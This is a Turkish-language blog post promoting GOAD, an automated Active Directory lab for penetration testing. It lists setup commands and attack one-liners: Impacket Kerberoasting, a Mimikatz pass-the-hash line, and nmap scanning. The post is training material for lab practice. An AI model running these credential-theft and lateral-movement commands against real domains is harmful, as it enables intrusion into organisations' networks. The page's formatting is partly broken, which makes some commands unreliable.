GOAD: Active Directory Güvenlik Testleri İçin Kapsamlı ve Otomatik Lab Ortamı

By /

Listen to this Post

Game Of Active Directory (GOAD), sızma testi uzmanları ve siber güvenlik profesyonelleri için tasarlanmış, tamamen otomatikleştirilmiş ve açık kaynaklı bir Active Directory (AD) laboratuvar projesidir. GOAD, gerçek dünyadaki AD yapılarını simüle ederek, güvenlik açıklarını keşfetmek ve saldırı tekniklerini pratik etmek için ideal bir platform sunar.

GitHub: https://lnkd.in/gVABcbZW

Practice Verified Codes and Commands:

1. Lab Kurulumu (VirtualBox):


<h1>GOAD-Light sürümünü indirme ve kurma</h1>

git clone https://github.com/GOAD-project/GOAD-Light.git
cd GOAD-Light
vagrant up

2. Kerberoasting Saldırısı:


<h1>Kerberoasting için Impacket kullanımı</h1>

git clone https://github.com/SecureAuthCorp/impacket.git
cd impacket
pip install .
python examples/GetUserSPNs.py -request -dc-ip <DC_IP> <DOMAIN>/<USER>:<PASSWORD>

3. Lateral Movement (Pass-the-Hash):


<h1>Pass-the-Hash saldırısı için Mimikatz kullanımı</h1>

sekurlsa::pth /user:<USER> /domain:<DOMAIN> /ntlm:<NTLM_HASH> /run:"cmd.exe"

4. Savunma Stratejileri (Güvenlik Politikaları Güncelleme):


<h1>Windows'ta güvenlik politikalarını güncelleme</h1>

secedit /configure /db secedit.sdb /cfg <POLICY_FILE>.inf

What Undercode Say:

GOAD, siber güvenlik alanında özellikle Active Directory yapılarının güvenliğini test etmek isteyenler için oldukça kullanışlı bir araçtır. Bu araç, gerçek dünya senaryolarını simüle ederek, hem saldırı hem de savunma tekniklerini uygulamalı olarak öğrenme fırsatı sunar. GOAD’ın otomatik kurulum özelliği, kullanıcıların hızlı bir şekilde lab ortamını hazırlamasına olanak tanır. Terraform ve Ansible gibi araçlarla entegre çalışabilmesi, farklı platformlarda esnek bir kullanım sağlar.

Kerberoasting, Pass-the-Hash ve Lateral Movement gibi saldırı tekniklerini test etmek için GOAD, zafiyetli AD yapılandırmaları sunar. Bu teknikler, gerçek dünyada sıkça karşılaşılan saldırı vektörleridir ve GOAD ile bu saldırıları simüle ederek, güvenlik açıklarını tespit etmek ve savunma stratejileri geliştirmek mümkündür.

GOAD’ın açık kaynaklı yapısı, kullanıcıların kendi ihtiyaçlarına göre özelleştirme yapabilmesine olanak tanır. Ayrıca, aktif geliştirici topluluğu sayesinde sürekli güncellenen ve desteklenen bir platformdur. Bu, GOAD’ı siber güvenlik eğitimleri ve testleri için ideal bir seçenek haline getirir.

Linux ve Windows ortamlarında kullanılabilecek bazı temel komutlar:

  • Linux:
    </li>
</ul>

<h1>Ağ taraması için Nmap kullanımı</h1>

nmap -sV -sC <TARGET_IP>

<h1>Dosya izinlerini değiştirme</h1>

chmod 600 <FILE_NAME>

<h1>Süreçleri listeleme</h1>

ps aux | grep <PROCESS_NAME>
    • Windows:
      </li>
</ul>

<h1>Ağ bağlantılarını listeleme</h1>

netstat -an

<h1>Güvenlik duvarı kurallarını görüntüleme</h1>

netsh advfirewall show allprofiles

<h1>Kullanıcı hesaplarını listeleme</h1>

net user

      GOAD, siber güvenlik alanında kendini geliştirmek isteyenler için vazgeçilmez bir araçtır. Hem saldırı hem de savunma tekniklerini uygulamalı olarak öğrenmek isteyenler için GOAD, gerçekçi senaryolarla dolu bir laboratuvar ortamı sunar. Ayrıca, GOAD’ın GitHub sayfasından daha fazla bilgi ve kaynak bulabilirsiniz: https://lnkd.in/gVABcbZW.

      References:

      Hackers Feeds, Undercode AIFeatured Image

Related Posts: